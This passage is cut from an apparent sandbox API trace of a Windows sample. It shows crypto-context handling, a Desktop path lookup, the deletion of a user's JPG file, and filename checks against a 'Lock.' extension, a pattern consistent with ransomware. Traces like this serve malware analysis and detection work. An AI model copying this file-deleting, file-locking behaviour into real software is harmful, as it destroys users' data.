(HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0141.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0141.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0141.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0141.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0141.742] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0141.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0141.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50950 [0141.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0141.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0141.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0141.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0141.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0141.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0141.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0141.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0141.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0141.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0141.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0141.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0141.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0141.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0141.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0141.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0141.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0141.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0141.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0141.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0141.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0141.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0141.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0141.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0141.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0141.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0141.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0141.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0141.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0141.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0141.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0141.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0141.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0141.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0141.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0141.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0141.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0141.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0141.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0141.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0141.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0141.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0141.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0141.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0141.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0141.744] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0141.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0141.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0141.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0141.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff48 [0141.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0141.744] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0141.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff48 | out: hHeap=0x970000) returned 1 [0141.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0141.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50830 [0141.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0141.803] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0141.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0141.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0141.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0141.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0141.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0141.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0141.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0141.807] FreeLibrary (hLibModule=0x756e0000) returned 1 [0141.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0141.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0141.809] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0141.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0141.815] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0141.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0141.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0141.815] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0141.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0141.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0141.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0141.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0141.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0141.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0141.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0141.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0141.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0141.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505f0 [0141.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505a8 [0141.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50440 [0141.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0141.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0141.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0141.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0141.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50650 [0141.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0141.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0141.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0141.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0141.822] CloseHandle (hObject=0x2a0) returned 1 [0141.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0141.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0141.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f05008 | out: hHeap=0x970000) returned 1 [0141.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0141.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0141.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0141.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0141.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0141.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0141.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0141.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0141.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0141.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0141.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0141.823] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0141.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0141.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0141.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0141.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0141.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0141.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0141.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0141.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0141.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50458 [0141.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50578 [0141.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505a8 [0141.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0141.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505f0 [0141.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0141.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50650 [0141.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0141.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0141.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0141.824] CloseHandle (hObject=0x2d0) returned 1 [0141.832] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0141.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0141.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0141.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0141.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0141.833] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0141.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0141.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0141.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0141.833] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0141.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0141.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0141.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0141.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0141.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0141.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0141.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0141.834] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/CSIs1Qt1V9g.jpg", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CSIs1Qt1V9g.jpg", lpFilePart=0x8cedf4*="CSIs1Qt1V9g.jpg") returned 0x27 [0141.834] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CSIs1Qt1V9g.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\csis1qt1v9g.jpg")) returned 0x20 [0141.834] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CSIs1Qt1V9g.jpg", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72b04720, ftCreationTime.dwHighDateTime=0x1d5e1d0, ftLastAccessTime.dwLowDateTime=0x3666e8e0, ftLastAccessTime.dwHighDateTime=0x1d5ed9d, ftLastWriteTime.dwLowDateTime=0x3666e8e0, ftLastWriteTime.dwHighDateTime=0x1d5ed9d, nFileSizeHigh=0x0, nFileSizeLow=0x185aa, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="CSIs1Qt1V9g.jpg", cAlternateFileName="CSIS1Q~1.JPG")) returned 0xa87610 [0141.835] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CSIs1Qt1V9g.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\csis1qt1v9g.jpg")) returned 1 [0141.837] FindNextFileW (in: hFindFile=0xa87610, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72b04720, ftCreationTime.dwHighDateTime=0x1d5e1d0, ftLastAccessTime.dwLowDateTime=0x3666e8e0, ftLastAccessTime.dwHighDateTime=0x1d5ed9d, ftLastWriteTime.dwLowDateTime=0x3666e8e0, ftLastWriteTime.dwHighDateTime=0x1d5ed9d, nFileSizeHigh=0x0, nFileSizeLow=0x185aa, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="CSIs1Qt1V9g.jpg", cAlternateFileName="CSIS1Q~1.JPG")) returned 0 [0141.837] FindClose (in: hFindFile=0xa87610 | out: hFindFile=0xa87610) returned 1 [0141.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0141.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0141.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0141.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0141.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538f0 | out: hHeap=0x970000) returned 1 [0141.837] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0141.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0141.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0141.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0141.837] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0141.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0141.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ffb8 [0141.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0141.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0141.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0141.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0141.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0141.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ffb8 | out: hHeap=0x970000) returned 1 [0141.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0141.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0141.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0141.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0141.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0141.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0141.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0141.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0141.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0141.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0141.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0141.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x50) returned 0x2e563a8 [0141.838] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/CSIs1Qt1V9g.jpg", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CSIs1Qt1V9g.jpg", lpFilePart=0x8cf650*="CSIs1Qt1V9g.jpg") returned 0x27 [0141.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0141.838] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CSIs1Qt1V9g.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\csis1qt1v9g.jpg")) returned 0xffffffff [0141.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0141.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0141.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0141.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538f0 | out: hHeap=0x970000) returned 1 [0141.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0141.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0141.838] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0141.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0141.839] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0141.839] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0141.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0141.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0141.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0141.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0141.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0141.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0141.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0141.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0141.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0141.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0141.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0141.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0141.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0141.839] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="desktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0141.839] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0141.839] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0141.839] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0141.839] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0141.839] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0141.839] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0141.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0141.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 